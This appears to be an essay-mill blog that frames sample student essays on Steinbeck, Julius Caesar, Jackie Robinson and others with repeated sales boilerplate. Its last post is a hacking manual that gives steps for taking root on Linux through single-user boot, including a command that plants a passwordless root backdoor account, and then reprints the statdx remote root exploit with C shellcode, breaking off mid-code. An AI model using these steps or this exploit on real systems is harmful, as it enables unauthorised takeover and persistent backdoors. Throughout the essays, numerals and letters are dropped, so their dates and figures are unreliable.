Subscribe

RSS Feed (xml)

Wednesday, December 18, 2019

bye

If you order your custom term paper from our custom writing service you will receive a perfectly written assignment on bye. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality bye paper right on time. Out staff of freelance writers includes over 120 experts proficient in bye, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your bye paper at affordable prices! The biggest reason I am seeking enrollment, is that I am I very disappointed with myself. I know I screwed up, and I know in my heart I could have done better.


If accepted, my goal at the University of Wyoming is simply this to graduate by May or December 006 with a GPA at or above .5.


Once my GPA reaches an acceptable level, I would like to become a resident assistant and live on campus, where I may be able to save new students, fresh into the world, the heartache, grief and regret that I have experienced.


I have learned volumes about life and reality over the past few years. I have gained a great deal of responsibility, and I firmly believe I am ready physically, psychologically, emotionally, and financially to finish what I have started. I am prepared to take every step necessary in order to return to good standings academically. These steps include, but are not limited to, study groups and private tutors. I am absolutely serious about higher education. Over the next few years of my life, I will be 100% dedicated to advancing my studies, both in private and in public environments.Please review this petition with an open mind, and a forgiving heart. I would like nothing more, than this one opportunity to resolve the ills of the past, and prove to myself, that I am capable of higher education and great deeds.


I can be made available for a private interview, and additional resources and personal references will be made available upon request.


Please note that this sample paper on bye is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on bye, we are here to assist you. Your cheap custom college paper on bye will be written from scratch, so you do not have to worry about its originality. Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!


of mice and men

If you order your research paper from our custom writing service you will receive a perfectly written assignment on of mice and men. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality of mice and men paper right on time. Out staff of freelance writers includes over 120 experts proficient in of mice and men, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your of mice and men paper at affordable prices! n the book Of Mice and Men, there are two characters the author,John Steinbeck, portrays. One, Curley, is a selfish, arrogant, and boastful man; compared to Slim, a reliable, trustworthy, and modest man. Therefore, Slim and Curley are Steinbecks examples of the best kind of man and the worst kind of man.


Curley is a character that is not looked up to. "His eyes passed over the new men and he stopped. He glanced coldly at George and Lennie. His arms gradually bent at the elbows and his hands closed into fists" (5). Just by the way Curly stands towards George and Lennie, they know Curley will look for a way to get Lennie "canned." Curley doesnt like Lennie because Lennie is bigger than he. George tells Lennie to always be aware of Curley and to keep his distance. "Look, Lennie. You try to keep away from him, will you? Dont ever speak to him. If he comes in here you move clear to the other side of the room"(). Even the first time George and Lennie saw Curley, they knew he would be trouble. George warned Lennie about Curley. Lennie understood and trusted George. Curley is deceitful, jealous, pugnacious, and rude. Based on the above description, Slim seems like more of a well-liked man.


Slim is a good friend, a good leader, and a very understanding man. "There was a gravity in his manner and had a quiet so profound that all talk stopped when he spoke. His authority was so great that his word was taken on any subject, be it politics or love. This is Slim, the jerkline skinner.....His ear heard more than what was said to him, and his slow speech had overtones not of thought, but of understanding beyond thought"(,4). Everyone could see that Slim wasnt just an all-around good person outside, but even more so inside his heart, but if he needed to be strict, he was. "Curley said, Well, I didnt mean nothing, Slim. I just ast you. Slim said, Well you been askin me too often. Im gettin God damn sick of it. If you cant look after your own God damn wife, what you expect me to do about it? You lay offa me"(6). Slim stood up for himself when Curley kept asking Slim about Curleys wife. Slim wasnt scared of Curley, and he wasnt about to let Curley run his life. Slim has fine characteristics and a loving heart. Curley can be cruel, selfish, and down right mean. Slim is a better man in comparison to Curley.


In conclusion, Slim has positive characteristics, unlike Curley who has a bad attitude and a negative personality. In this book, Steinbeck writes descriptively the traits of each character. Slim is the example of the best kind of man, and Curley, on the other hand, is portrayed as the worst kind of man.


Purchase your paper on of mice and menPlease note that this sample paper on of mice and men is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on of mice and men, we are here to assist you. Your persuasive essay on of mice and men will be written from scratch, so you do not have to worry about its originality. Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!


Monday, December 16, 2019

Caesar

If you order your research paper from our custom writing service you will receive a perfectly written assignment on Caesar. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality Caesar paper right on time. Out staff of freelance writers includes over 120 experts proficient in Caesar, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your Caesar paper at affordable prices! The Gender Transformation of Caesar


Shakespeares Julius Caesar opens with the concurrent celeations of Caesars defeat of Pompey and the annual fertility festival of Lupercal. The coupling of the two historically separate events each celeating distinct gender roles dramatically highlights the importance of gender characterization. Romes patriarchal society demands a leader who embodies the virile spirit of the state with leadership marked by strength, courage, and constancy. Caesar quite fittingly assumes this role as he returns valiant and victorious from the battlefields; thus, in order to remove him the strong ruler of Rome, Caesars enemies must retrench his masculinity. Roman society considers women as the embodiment of weaknesses, thinking that their physical, mental, and political inferiority make them of little use beyond reproductive purposes, explaining why aspirants to the throne feminize the identity of the masculine warrior figure to position him as unfit for the crown.


The portrayal of the two female characters of the novel, Portia and Calphurnia, captures the prevailing stereotypical perceptions of women. Caesars wife, Calphurnia, demonstrates womens predisposition towards fearfulness and superstition when she pleads with Caesar to remain at home after dreaming that a statue made in the likeness was Cesar pouring forth blood. Calphurnia establishes the sentiment that fear is a feminine trait with her entreaty to Caesar asking him to use her anxiety as an alibi, saying, Do not go forth today. Call it my fear. (..50). Caesar agrees to this arrangement temporarily with a veiled acknowledgment of the reality- a rhetorical question relating to the fact that he is afeard to tell the graybeards the truth (..67). Caesar then immediately displays his weak resolution when Decius easily persuades him to reverse his earlier decision, and he proceeds to greet the senators, demonstrating another hazardous trait associated with women, inconstancy. Portia similarly behaves in accession with the low expectation of women and demonstrates how weak a thing/ The heart of woman is! (.4.40). She proves herself untrustworthy and reveals to Luciusutus involvement in the conspiracy because is overcome with fear. Caesar suffers a great insult through his association with the weak will of woman because in Roman society masculinity is the gauge of Roman worthiness.


Cassius undertakes a dual strategy in rendering Caesar unfit for the position. By listing moments of weakness in Caesars past which illustrate his feminine tendencies, Cassius systematically dismantles the virility of a figure who should be the embodiment of the Roman ideals of masculinity, but he simultaneously seeks to tag Caesar as an immovable, tyrannical leader to provide a solid moral rationale behind the conspiracy. Cassius revelations underscore the question of how [a] man of such feeble temper should/ So get the start of the majestic world (1..1-10). Cassius rescues him from drowning when Caesar cries Help me, Cassius or I sink! (1..111). Similarly, Cassius reveals how Caesar cries for water as a sick girl (1..18). Continuing this attack, Cassius tells of how Caesar, like a woman, is superstitious grown of late (.1.15). Ultimately, Caesars vulnerability becomes fully realized through Cassius projections because they provide the impetus forutus to join the cause.


Essay writing services for Caesar papers Providing further contrast to the complaint of Caesars strong, inflexible leadership are the physical imperfections which the conspirators exploit as signifiers of feminine weakness. Caesars physical imperfections include the possibility that he is deaf in one ear (1..1) because he must turn his head to hear someone speak (1..17). Compounding this defect, Caesar is also subject to epileptic fits. Caesar adds credibility to claims questioning his fitness for leadership by faltering at the very moment that he is to receive the crown (1..47-54).utus comment Tis like he hath the falling-sickness both literally and figuratively foreshadows the progressive devolution of Caesars masculinity which ultimately culminates in his bloody death.


Caesars death is wrought with imagery of blood and tears that parallels a birthing process in which the mothers life becomes a sacrifice for the survival of the child. Perhaps in death Caesar is able to create a new Rome, lending an interesting twist to the competition over leadership of this new state between his sonsutus and Anthony. Antonys prediction that Domestic fury and fierce civil strive/ Shall cumber all part of Italy announces that Caesars murder threatens disruption of the motherland of Rome (.1.6-64). Because the woman is the ruler of the domestic realm the use of the word domestic inadvertently places the Caesar in a feminine role. Caesar is symbolically the highest authority of a feminine entity, considering that Rome is classified as a feminine noun. Conjuring up further domestic imagery is Antonys comment that mothers shall but smile when they behold/ Their infants quartered with the hands of war (.1. 67-68). Perhaps by placing Caesar in an unconventional mother-like role, Shakespeare allows for him to conceive the children that his infertile wife, Calphurnia, is never able to, thus, allowing for the full realization of Lupercal, the event that symbolically opens the play. In Calphurnias foreboding dream of Caesars statue, Which, like a fountain with an hundred spouts, / Did run pure blood, and many lusty Romans/ Came smiling and did bathe their hands in it (..76-7), Caesar becomes a nursing mother as his, suggesting that Caesar provides mother-like lifeblood to his country in his death, reaffirming Decius earlier interpretation of Calphurnias dream that from you [Caesar] Rome shall suck/ Reviving blood (..87). A variation of the notion of Caesar as a reproductive figure is the notable parallel between the bloody images used to discuss Caesars body and the menstrual of women. The phrases all the while ran blood (..11) and bleeding business (.1.168) accompanying this discussion create a distorted image of the reproductive cycle. Assuming that Caesar does achieve a mutated form of reproduction, Shakespeare fittingly develops a bizarre and twisted characterization of sexuality.


Caesar becomes further feminized when his figure no longer is that of an ideal valiant warrior which inspires men; rather the feminine vulnerability of his wounded stirs feeling of pity.utus comment Had I as many eyes as thou hast wounds/ Weeping as fast as they stream forth thy blood (.1.00-01) relates the transformation of a world recently clad with armory and weapons to state reduced tears. Caesar becomes like a woman who has been completely violated by ruthless hunters who requires a strong male-like figure to vindicate the injustice which has been done to her [him]. Calphurnias earlier use of the phrase lusty Romans adds a sexualized dimension to the regicide, allowing for the possibility that the hunters metaphorically rape Caesar. As the men ritualistically cover themselves with Caesars blood it as if they are celeating the success of the hunt. Antony condemns the conspirators as predatory and bestial hunters and creates the image of a victimized Caesar, saying


Villians! You did not so, when your vile daggers


Hacked one another in the sides of Caesar


You showed your teeth like apes, and fawned like


hounds (5.1.-4).


Caesars corpse stirs pity in the hearts of his oppressors, a far cry from the tyrannical leader framed by his accusers. In Antonys glorification of the corpse of Caesar, Caesar has been truly reduced to a feminine state. He requires a man to plead his case with society, and the strong figure is accessible and needs the support of the fickle masses.


Show you sweet Caesars wounds, poor poor dumb mouths,


And bid them speak for me. But were Iutus,


andutus Antony, there were an Antony


Would ruffle up your spirits, and put a tongue


In every wound of Caesar that should move


The Stones of Rome to rise in mutiny. (..7-)


Calphurnia whose warning goes unheeded by Caesar demonstrates the impotency of a womans voice. In death Caesars voice, like that of a woman, is no longer heard, and his violated body projects the image mouths which are objects serving as symbols of female sexuality to which Antonys reference to tongues gives additional sexual implications. It is the tongue and mouth that serve as the initial sight of contact when kissing occurs. The sexuality of this imageings further strength to the previous parallel made between the reproductive process and Caesars death.


The transformation of Caesar from a figure of male potency to one of feminine weakness creates a complicated and distorted message of sexuality. Traits become no longer inherently masculine or feminine because the ultimate fate of Caesar merges weakness and strength. The strange paradox of the play is how wounds, a traditionally feminine sign of vulnerability, ultimately become equated with masculinity. Portias decision to voluntarily wound herself demonstrates the awe and admiration which wounds can inspire in the masculine sphere; it is after seeing her self inflicted wounds thatutus discloses to her the secret plans of the conspiracy. Similarly, it is through his wounds that Caesar is able to eventually to win vindication for his death because they move the crowd to action against the conspirators, allowing for leadership through injury. The sword symbolically represents a phallic-like sign of vitality which leads to the retransformation of Caesar into a figure of masculinity.utus acknowledges, O Julius Caesar, though art mightly yet/ Thy spirit walks aoad and turns our swords/ In our own proper entrails (5..4-6). The sword that causes Caesars fatal wounds serves as the instrument thatings an end to Cassius andutus. Cassius proclaims in his death Guide thou the sword- Caesar, thou art revenged, /Eve with the sword that killed thee (5..45-46). This conclusion of ultimate victory of the masculine spirit seems the only fitting outcome for Shakespeare to engineer if his play is to be a true reflection of Roman culture. Women hold value only in terms of the services that the provide which advance the interests of the masculine community, and in this case, the conspirators needed grounds to render Caesar inadequate for his position and feminizing him provides a useful mechanism in doing so. The retransformation of Caesar solidifies itself in Octavious declaration to the world that This was a man!, (5.5.75) reinforcing the notion that the masculine spirit will prevail in Roman society.


Please note that this sample paper on Caesar is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on Caesar, we are here to assist you. Your persuasive essay on Caesar will be written from scratch, so you do not have to worry about its originality. Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!


Friday, December 13, 2019

Computers are very important in our 21th century civilisation. Do we really need them?

If you order your research paper from our custom writing service you will receive a perfectly written assignment on Computers are very important in our 21th century civilisation. Do we really need them?. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality Computers are very important in our 21th century civilisation. Do we really need them? paper right on time. Out staff of freelance writers includes over 120 experts proficient in Computers are very important in our 21th century civilisation. Do we really need them?, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your Computers are very important in our 21th century civilisation. Do we really need them? paper at affordable prices! Computers are very useful for keeping on storage a very large amount of information. People use computers almost in every field. They prove a high inportance in the sphere of sciences, like mathematics, phisics, chemistry, biology. In medicine with its help deseases can be discovered and cured.


Personal computers are useful in projecting buildings more punctually and extremely faster too. Its an extremely big help on orientating the airplanes and ships.


They are used to detect the weathers changing, geological observings.


Todays computer stays in permanent connection with the internet-in other words the world wide web.The internet was built out initially for military purposes. The military bases had to be connected in a certain way, without a phisically perceiveabele way. So they invented to connect by radio-waves, by the means of an earth-satellite.


Order essays on Computers are very important in our 21th century civilisation. Do we really need them? and other topics


By the virtual web two computers that are thousand miles away from each other can be connected. Thus changing information becomes very fast the information travels at the speed of the light.


Great banks transfer money through it. Thus it is of capital impotrance in economic life. For instance two architects can work on a project of a whole city without meeting one another personally in their life. It is also possible, that a doctor may do a life-saving operation without being in the same city with the patient.


People are able to do good as bad things too. Good things are that people can accumulate very useful and important informations which they need for learning or satisfy their curiousity. They get those informations very quickly, and in confortable and easy ways. Connected to the world wide web, you are even able to play a game with real game-mates, that are on another continent.


Do we really need computers? The answer is yes and No, Yes, in a certain way, when it helps a good intention. But when the human factor fails, can cause global, uncurable problems.


Please note that this sample paper on Computers are very important in our 21th century civilisation. Do we really need them? is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on Computers are very important in our 21th century civilisation. Do we really need them?, we are here to assist you. Your persuasive essay on Computers are very important in our 21th century civilisation. Do we really need them? will be written from scratch, so you do not have to worry about its originality. Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!


Thursday, December 12, 2019

Jackie Robinson

If you order your research paper from our custom writing service you will receive a perfectly written assignment on Jackie Robinson. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality Jackie Robinson paper right on time. Out staff of freelance writers includes over 120 experts proficient in Jackie Robinson, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your Jackie Robinson paper at affordable prices! JACKIE ROBINSON


"A life is not important except in the impact it has on other lives," this is a very true statement that Jackie Robinson said. He played a big part by changing many other blacks lives. He encouraged many blacks to follow in his footsteps, which was having the courage toeak the color line in major league baseball and having a great athletic ability which still and will be revered by the games followers.


His courage and persistence helped his get by the hard times to the better times. He also relied on his mothers strength, love, and attention. His keys to success were to not let all the racialism get to his head and make himself stop playing baseball, and he had the ability to stand up to injustice without compromising his personal integrity and beliefs. With those keys in mind, he never let verbal assaults get to him, from home and visitor games. He didnt stop playing because other teams were after him and spiked him, but life threats probably did scare him, but didnt let it get to his head. Once when he was to play in Cincinnati, he received a life threat that he shouldnt come otherwise they would kill him. The FBI investigated and nothing happened during the game. He continuously got hate mail and other threats like getting his baby kidnapped, but nothing actually happened. Many times fans yelled name at him, one time a game in Baltimore, Maryland many fans yelled racial slurs at him for nine straight innings. Many other incidents happened. At a game in Indiana he was pulled from a game because of a law prohibiting interracial athletes. During another game an opposing player threw a black cat onto the field and yelled at Robinson that the cat was his cousin. The worst behavior he ever heard from the crowd was when a torrent of mass hatred burst from the stands with every move he made and managed only one hit. During the time he was on the Royals, Jackie had suffered from nearly all white crowd in Louisville, but when the series went to Canada, that Canadians released a boo every time a Louisville player stepped up to bat. Jackie didnt approve this retaliation, but felt a great sense of gratitude. The Royals went on to winning the Championship because of the crowds support. That was probably the only time Jackie was loved from the crowd.


This is probably the main reason Jackie Robinson is so famous, he was the first black to play in major league baseball and to be accepted, which encouraged other blacks to follow him.anch Rickey should also be thanked, for letting Jackie be on the team and helping him get through the hard times.anch Rickey, the Dodgers president, told Jackie, "This is baseballs great experiment." Mr. Rickey made Jackie promise not to fight back or talk back, but instead shrug if off. After Mr. Rickey proposal Jackie Robinson responded, "If you want to take this gamble, I will promise you there with be no incident," On April 15, 147 he hit for a first time in major league baseball and did a very poor job, so people started questioning Jackies ability. After Jackie gained confidence, he started playing outstanding baseball. Many people, black and white, came to watch him play baseball, steal homes, and hit home runs. He got many people interested in baseball. The Dodgers won the National League pennent, and Jackie placed first in stolen bases, second in runs scored, and tied for first for home runs, 1. The newspapers, which doubted Jackie in the beginning, now said that "baseballs great experiment" had been a great success. He did such an outstanding job, so the paper named him Rookie of the Year.anch Rickey admired him because he kept all the tension in for two years. "Robinson had performed his pioneering role with courage and dignity." Now Rickey told Jackie that he was on his own and could speak his mind. After Jackie spoke about his social and political beliefs to a nationwide audience. "I cant speak for 15 million people any more than any other person can, but I know that Ive got too much invested for my wife and child and myself in the future in this country, and I and other Americans of many races and faiths have too much invested in our countries welfare, for any of us to throw away….. But that doesnt mean were going to stop fighting race discrimination in this country until weve got it licked. It means were going to fight it all the harder because our stake in the future is so big." Afterwards he became praised for his affirmation of American ideals and because of that he became a more popular player.Professional writers help on Jackie Robinson essays


In 14 Robinson showed his very best by finishing the season with a .4 hitting average, which was the highest in the league. He led the league in stolen bases, 7, and placed very high with many other records. He was nearly perfect defensively, like a vacuum cleaner sucking up ground balls at second base. His story became so famous that they made his life into a movie and make a Jackie Robinson watch. Now in major league baseball he has been accepted by most, but not all. This is around the time he received a life threat, which was the 150 season. During that year he finished with a .8 average for baseball, the best in National League. Whenever he was interviewed, he always told the truth and said very meaningful things, and he was and still is know as one of the most outspoken athletes of his generation. Many blacks followed after him, but still racism held many back. During the 15 season he continued to be a star batter with a . average and scored 10 runs. After he continued to play many more fantastic games, but his body was beginning to slow down. In January of 157 he retired from baseball. Jackie got into politics and in 16 he became eligible for induction into the Baseball Hall of Fame which is the highest honor a baseball player can receive, he received it because he make a significant contribution to the game. He made his last pubic appearance at the ceremony at the Dodger Stadium to commemorate the 5th anniversary of his first major league season, his body was deteriorating, but he still walked across the field for the last time to watch his number retire, 4, on October 4, 17. He left behind a legacy of great accomplishments, his amazing athletic ability and he was the pioneer for blacks to play major league baseball and he did it by having the courage to face the prejudice.


Please note that this sample paper on Jackie Robinson is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on Jackie Robinson, we are here to assist you. Your persuasive essay on Jackie Robinson will be written from scratch, so you do not have to worry about its originality. Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!


Wednesday, December 11, 2019

Hacking into Linux

If you order your research paper from our custom writing service you will receive a perfectly written assignment on Hacking into Linux. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality Hacking into Linux paper right on time. Out staff of freelance writers includes over 120 experts proficient in Hacking into Linux, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your Hacking into Linux paper at affordable prices!


Hacking into Linux


___________________________________________________________


Essay service for your Hacking into Linux paper


Till now almost all Hacking Truths manuals have been Windows centric. I have always kept the newbie Windows user in mind, while writing manuals. However, with the growing popularity of Linux and the fact that Linux is considered to be the Hackers OS, I decided to start a nix series.


Getting Root on a Linux machine


As you read this manual, you will discover that our basic aim always remains the same, i.e. we want to get root. Now, root is nothing but sort of a sort user, who has maximum privileges, and can do whatever he wants to do on a system. Root is to nix what administrator is to Windows NT. If you get root then you can practically control each and every aspect of the system. You could, remove accounts, delete files, disable daemons, and even format the entire system.


NEWBIE NOTE Getting root is considered to be really really elite especially in schools. If you are able to get root in your school network, then you practically get transformed into a semi-god, but why? Well, the reasons are pretty obvious. Arent they?


OK, I am really interested. How do I do it? Well, in this section, we are not going to run any C program nor are we going to do any kind of coding, but we will simply exploit a small vulnerability existing in a feature which comes with Linux. This will work almost times out of 10, however, if you plan to use this technique to get root on your ISP, then forget it pal. The technique explained below is quite common and the system administrator would probably be smart enough to cover up this security loophole.


Before we move on, there is one thing that you need to keep in mind. i.e. For this to work, you need to have physical access to the target system. Anyway, boot the target system and wait for the LInux LOader or LILO Prompt to come up.


At the LILO prompt type linux single (without Quotes) or linux 1 to get the root shell where you can practically do anything.


Once Linux single is running, you get the root shell where you can type can any command which is accepted by the default shell on your system. Now, here, type linuxconf. This willing up a blue screen, which is the Linux Configuration Utility. Then, click on Users Root Password. This will allow you to change the root password!!! Yes, you read right, change the root password. Scroll down further, and you could also add new accounts with root privileges.


The linux config utility is certainly not a hole in Linux. It was actually designed to help, if the root password was forgotten.


Well, there is yet another way in which we can get root. In the first method, we typed linuxconf in the bash shell prompt, however, we could type the following to create a new account with root privileges and without any password


echo "ankit00" /etc/passwd


This command will basically edit the /etc/passwd file which is the password file which stores the Passwords and Usernames of all accounts on the machine. One thing to remember here is that you can edit the /etc/passwd file only if you are logged in as root, however, in this case we are not logged in as root, but we have booted into linux single which gives us the root shell. Hence, we can still edit it.


Anyway, to understand how exactly the above command works and how it is able to create a new account without a password, we need to learn the /etc/passwd file is structured.


The following is a line from a password file


ankitmy_passwordAnkit Fadia/home/ankit/bin/bash


The above can in turn beoken up into


Username ankit


Encrypted Password my_password


User number


Group Number


Actual Name Ankit Fadia (Optional)


Home Directory /home/ankit (Optional)


Type of Shell /bin/bash (Optional)


In our command, we have not included the optional fields and the password field of a typical password file line. Our command


echo "ankit00" /etc/passwd


can be rewritten as


Username ankit


Encrypted Password


User number 0


Group Number 0


Actual Name


Home Directory


Type of Shell


This basically creates a new account with root privileges, which can be used as a Backdoor into the system.


HACKING TRUTH If you have enabled, shadow passwords, then the command will change to


echo "ankit00" /etc/shadow


A typical line from the password file on a system with Shadow Passwords enabled is as follows


ankitAnkit Fadia/home/ankit/bin/bash


In a shadowed password file what happens is that the password field is replaced by a (The is called a token.) such that the encrypted password does not show up in the password file and the list of encrypted passwords is stored in a different file which is not readable by normal users.


I have tired the above method on a number of systems, and have found that it works only about 80% of the times. So, after some more fooling around, I came about with yet another method, which till now seems to be foolproof.


Now, as you are in the root shell, launch your favorite editor (eg vi) and open /etc/passwd in it. Now, delete the encrypted text between the first two colons in the line, which contains the entry for root. This, will not create a new account with root privileges, but will change the password of the root, to null. So, basically this will get you a root account without any password. Once, you have removed the encrypted password, at the prompt, type init to switch back to the normal start up or else for a graphical start up type init 5.


Now, say you do not want to create a new account, but want to change the root password so as to teach the system administrator a lesson. What do you do? Well, simply use the passwd command followed by the new password. As you are in the root shell, the root password will change to the new one that you supply.


OK, I get the point; Linux too is not 100% safe, so how can I make it safer? Well, you could password protect linux single. To do so, you have to launch your favorite editor like vi, and open /etc/LILO.conf. Now, add the following line, in a new line, after the first line


Restricted password_goes_here


(The above is Restricted followed by a space and following by the password that you choose.)


Now, save and close the editor. At the prompt then type LILO, to execute the /etc/LILO.conf file, so as to make the changes. Now, the next time, you type linux single, at the LILO prompt, you will be asked the password that you typed in the above file. So this basically acts as another barrier for anyone trying to use the techniques described in this manual, toeak into your Linux box. None, of the other functioning of the linux box will be affected.


HACKING TRUTH Well, Aragon (veljkop@ptt.yu ) suggested yet another method, which I would like to mention.


1.Go to directory /etc/rc.d


.In it there should be several files if your lucky there are a bunch of files with similar names rc.1,rc....etc. these files are shell scripts which are run each time when the named runnlevel is started. These files are very much similar to autoexec.bat but even more complex you can mess with them to cause interesting results BUT be CAREFULL!). rc.1 is therefore the file for runlevel one


.Backup it in a file named rc.x (or something else)


4.Copy some other runlevel (runlevel is good) but make sure that the runlevel is multi-user.


5.Make a boot and root(for Slackware) disc (do not skip this) so if anything goes wrong you still have a


runlevel 1


Getting root Remotely


The following has been taken from Bugtraq, this exploit is supposed to get you root. However, it has not been tested or verified by me. So give me the feedback.


___________________________________________


From ron1n - shellcode@HOTMAIL.COM


Subject Redhat Linux 6.x remote root exploit


To BUGTRAQ@SECURITYFOCUS.COM


X-UIDL ad856edbbc7d8db5d468ce6eb1f600


Hi,


Included below is an exploit for the recently exposed linux rpc.statd


format string vulnerability[0]. I have tailored it towards current Redhat


Linux 6.x installations. It can easily be incorporated into attacks against


the other vulnerable Linux distributions.


I am not a security expert, but Ill offer my two cents worth this format


string issue, while drawing upon elements of straightforward buffer overflow


exploitation, is more insidious and will probably take some time to instill


itself in the minds of even security-conscious programmers. Programs like


ITS4[1], pscan[], and grep (heh!) do offer valuable assistance when trying


to isolate weak portions of code in a phase one search. However, one thing


Ive


learnt during my short time researching these things is that the complex


interaction between code and data introduces the need for a more extensive


line by line audit[].


This new problem will (if it hasnt already) spark a new wave of code


reviews


of critical applications, especially those networking daemons and privileged


programs which were given the all clear in the first sweep (although


history


shows us that a lot of programs somehow slipped through the cracks.) Someone


else sent an excellent post about the possibility of remote debugging with


these format string vulnerabilities. Once again, Im not speaking out of any


authority, but I can say that such an aid to otherwise blind exploitation


is indeed a godsend when a host is being probed by a skilled intruder.


You must understand that this particular vulnerability is much harder to


exploit than the buffer overflow vulnerabilities that youre probably


accustomed to. The problem which will bite you is that if the calculations


are not precise, statd crashes with a SIGSEGV. As youve realized by now,


ute forcing wont cut it. Also, a successful exploitation will render


subsequent attacks fruitless.


I have seen statd running on a great number of linux systems and if you can


simulate an attack against a remote system on one of your own boxes, it is


trivial to exploit that remote system. Despite the shortcoming with


the single attempt restriction, it was possible to reduce the exploitation


variables down to a SINGLE address for most attacks. The default values


for Redhat Linux 6.x work fine for me, so Im probably fussing over nothing.


Anyway, enjoy the exploit.


ron1n


shellcode@hotmail.com


Sydney, Australia


McDonalds drive-thru guy


[0] http//www.securityfocus.com/


[1] http//www.rstcorp.com/its4/


[] http//www.striker.ottawa.on.ca/~aland/pscan/


[] http//www.openbsd.org/


!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$


/


statdx


Redhat Linux 6.0/6.1/6. rpc.statd remote root exploit (IA)


by ron1n shellcode@hotmail.com


July 4, 000


Sydney, Australia


Oh you probly wont remember me


Its probly ancient history


Im one of the chosen few


Who went ahead and fell for you


$ gcc -o statdx statdx.c ; ./statdx -h


background info


---------------


rpc.statd is an ONC RPC server that implements the Network Status


Monitor RPC protocol to provide reboot notification. It is used by


the NFS file locking service (rpc.lockd) when it performs lock


recovery.


Due to a format string vulnerability in a call to syslog() within


its logging module, rpc.statd can be exploited remotely by script


kids bent oneaking into your Redhat Linux box and defacing your


website with crackpot political musings.


This is not a traditional buffer overflow vulnerability. The data


are kept within the bounds of the buffer by means of a call to


vsnprintf(). The saved return address can be overwritten indirectly


without a contiguous payload. syslog() is given, for the most part,


a user-supplied format string with no process-supplied arguments.


Our format string will, if carefully constructed, cause the process


to cull non-arbitrary addresses from the top of the stack for


sequential writes using controlled values. Exploitation requires


an executable stack on the target host -- almost invariably the


case. This problem was corrected in the nfs-utils-0.1..1 rpm.


exploit info


------------


You have one shot at this in most situations, so get it right!


If you know the port number rpc.statd is serving requests on, you


can supply the port number on the commandline to bypass the initial


portmapper query. This is very useful for hosts which are filtering


inbound connections to the portmapper. The default attack protocol


is UDP. There is a commandline option to use TCP. Apparently, the


dispatcher uses both protocols by default.


If youre only interested in exploiting a host, then you can safely


skip the following information. Youll only need a buffer address


to get started. This buffer address will either be one of my canned


ones or your own one. It must be precise, and this is where youre


likely to experience difficulties with your attacks.


[va_list][str][4][r][4][r+1][4][r+][4][r+]-----


| |


%esp buffer[104]


[%x..][%!d][%n][%!d][%n][%!d][%n][%!d][%n][sc]---


| r | r+1 | r+ | r+ |


buffer - This is the address youll need (-a and -l options)


str - Process-supplied string; 4 bytes long


4 - Duplicate dwords to satisfy the %!d specifiers and


the double %n when two successive values are equal


r - Stack position of saved eip


%x.. - Wipes the va_list dword and str; by default (-w option)


%!d - Used for padding to form an aggregate overwrite value;


the exclamation mark denotes a field width. This may


or may not be present, depending on the value. An


algorithm is used to allow tricky values.


%n - Writes overwrite value to the corresponding address


sc - Nops + portbinding shellcode (port 168)


Only modify the default wipe value and the default offset value if you


know what youre doing.


An easy way to get the buffer address for simulation systems that you


have privileged access to


[term 1]# ltrace -p `pidof rpc.statd` -o foo


[term ]$ ./statdx -r 0x41414141 localhost


[term 1]# grep vsnprintf foo | head -1 | sed s/.(// |


awk -F, {print $1}


(Of course, ensure that rpc.statd is started at boot time and not from


an interactive shell, otherwise it will inherit a larger environment


and blow the accuracy of your findings.)


Ok, longwinded enough. Lets dance.


greets


------


ADM, attrition, rogues, security.is, teso


/


#include stdio.h


#include stdlib.h


#include string.h


#include errno.h


#include unistd.h


#include netdb.h


#include rpc/rpc.h


#include sys/types.h


#include sys/time.h


#include sys/socket.h


#include netinet/in.h


#define SM_PROG 10004


#define SM_VERS 1


#define SM_STAT 1


#define SM_MAXSTRLEN 104


#define max(a,b) ((a)(b)?(a)(b))


#define NOP 0x0


/


Non-ripped linux IA portbinding shellcode.


port 168 ; length 1 bytes


/


char shellcode[] =


x1xc0 / xorl %eax,%eax /


/ jmp ricochet ------------------------------------------------------- /


xebx7c / jmp 0x7c /


/ kungfu ------------------------------------------------------------ /


x5 / popl %ecx /


x8x41x10 / movl %eax,0x10(%ecx) /


/ ------------------------------------ socket(,1,0); ---------------- /


x8x41x08 / movl %eax,0x8(%ecx) /


xfexc0 / incb %al /


x8x41x04 / movl %eax,0x4(%ecx) /


